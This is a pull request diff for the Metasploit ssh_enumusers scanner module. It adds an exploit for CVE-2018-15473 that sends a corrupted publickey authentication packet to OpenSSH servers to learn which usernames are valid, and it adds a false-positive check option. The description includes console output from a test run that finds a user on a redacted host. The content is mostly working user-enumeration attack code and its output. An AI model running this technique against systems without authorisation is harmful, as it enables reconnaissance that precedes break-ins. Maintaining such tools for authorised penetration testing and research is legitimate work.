### PR TITLE
Add CVE-2018-15473 to ssh_enumusers

### DIFF
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def rand_pass
-    Rex::Text.rand_text_alphanumeric(64_000..65_000)
+    Rex::Text.rand_text_english(64_000..65_000)
   end
 
   def do_report(ip, user, port)
@@ -263,11 +263,14 @@ end
 #
 # XXX: This is ghetto af (see lib/msf/core/exploit/fortinet.rb)
 #
+# https://tools.ietf.org/rfc/rfc4252.txt
+# https://tools.ietf.org/rfc/rfc4253.txt
+#
 class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authentication::Methods::Abstract
   def authenticate(service_name, username, password = nil)
     debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }
 
-    # Truncate everything after auth method
+    # Corrupt everything after auth method
     send_message(userauth_request(
 =begin
       string    user name in ISO-10646 UTF-8 encoding [RFC3629]
@@ -279,7 +282,8 @@ class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authenticat
 =end
       username,
       service_name,
-      'publickey'
+      'publickey',
+      Rex::Text.rand_text_english(8..42)
     ))
 
     # SSH_MSG_DISCONNECT is queued

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -66,7 +66,9 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('THRESHOLD',
                    [true,
                    'Amount of seconds needed before a user is considered ' \
-                   'found (timing attack only)', 10])
+                   'found (timing attack only)', 10]),
+        OptBool.new('CHECK_FALSE',
+                    [false, 'Check for false positives (random username)', false])
       ]
     )
 
@@ -231,15 +233,18 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    print_status "#{peer(ip)} Using #{action.name.downcase} technique"
-    print_status "#{peer(ip)} Checking for false positives"
-    if check_false_positive(ip)
-      print_error "#{peer(ip)} throws false positive results. Aborting."
-      return
-    else
-      print_status "#{peer(ip)} Starting scan"
-      user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
+    print_status("#{peer(ip)} Using #{action.name.downcase} technique")
+
+    if datastore['CHECK_FALSE']
+      print_status("#{peer(ip)} Checking for false positives")
+      if check_false_positive(ip)
+        print_error("#{peer(ip)} throws false positive results. Aborting.")
+        return
+      end
     end
+
+    print_status("#{peer(ip)} Starting scan")
+    user_list.each { |user| show_result(attempt_user(user, ip), user, ip) }
   end
 end
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -24,6 +24,8 @@ class MetasploitModule < Msf::Auxiliary
         On some versions of OpenSSH under some configurations, OpenSSH will return a
         "permission denied" error for an invalid user faster than for a valid user,
         creating an opportunity for a timing attack to enumerate users.
+
+        Testing note: invalid users were logged, while valid users were not. YMMV.
       },
       'Author'         => [
         'kenkeiras',     # Timing attack


### PR DESCRIPTION
Code has been refactored, continuing from our work in #3157. cc @kenkeiras!

- [x] Test `Malformed Packet` action
- [x] Test `Timing Attack` action
- [x] Make sure I didn't mess up the refactor

```
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
```